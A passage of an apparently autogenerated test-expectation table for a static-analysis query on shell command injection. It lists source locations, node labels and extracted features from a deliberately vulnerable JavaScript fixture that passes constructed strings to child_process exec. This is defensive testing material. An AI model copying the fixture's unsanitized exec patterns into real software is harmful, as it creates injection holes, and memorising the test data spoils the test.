last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:47 | require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:47 | require ... ocess') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:52 | require ... ').exec | CalleeFlexibleAccessPath | promisify | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:52 | require ... ').exec | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:52 | require ... ').exec | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:52 | require ... ').exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:52 | require ... ').exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:24:475:52 | require ... ').exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:32:475:46 | 'child_process' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:32:475:46 | 'child_process' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:32:475:46 | 'child_process' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:32:475:46 | 'child_process' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:32:475:46 | 'child_process' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:32:475:46 | 'child_process' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:49:475:52 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:49:475:52 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:475:49:475:52 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:1:477:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:1:477:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:1:477:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:1:477:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:1:477:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:1:477:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:1:480:1 | module. ... cmd);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:1:480:1 | module. ... cmd);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:1:480:1 | module. ... cmd);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:8:477:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:8:477:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:8:477:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | exec | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | exec | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | path | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | path | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | this | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | this | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:477:17 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | 'arguments' object of function check | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | 'arguments' object of function check | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | 'arguments' object of function check | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | 'arguments' object of function check | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | 'arguments' object of function check | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | exceptional return of function check | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | exceptional return of function check | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | exceptional return of function check | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | exceptional return of function check | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | exceptional return of function check | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | functio ... cmd);\\n} | assignedToPropName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | functio ... cmd);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | functio ... cmd);\\n} | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | functio ... cmd);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | return of function check | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | return of function check | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | return of function check | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | return of function check | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:18:480:1 | return of function check | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:27:477:31 | check | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:27:477:31 | check | contextSurroundingFunctionParameters | (config) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:27:477:31 | check | enclosingFunctionBody | config cmd path join config installedPath myBinary -v exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:27:477:31 | check | enclosingFunctionName | check | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:27:477:31 | check | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:477:33:477:38 | config | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 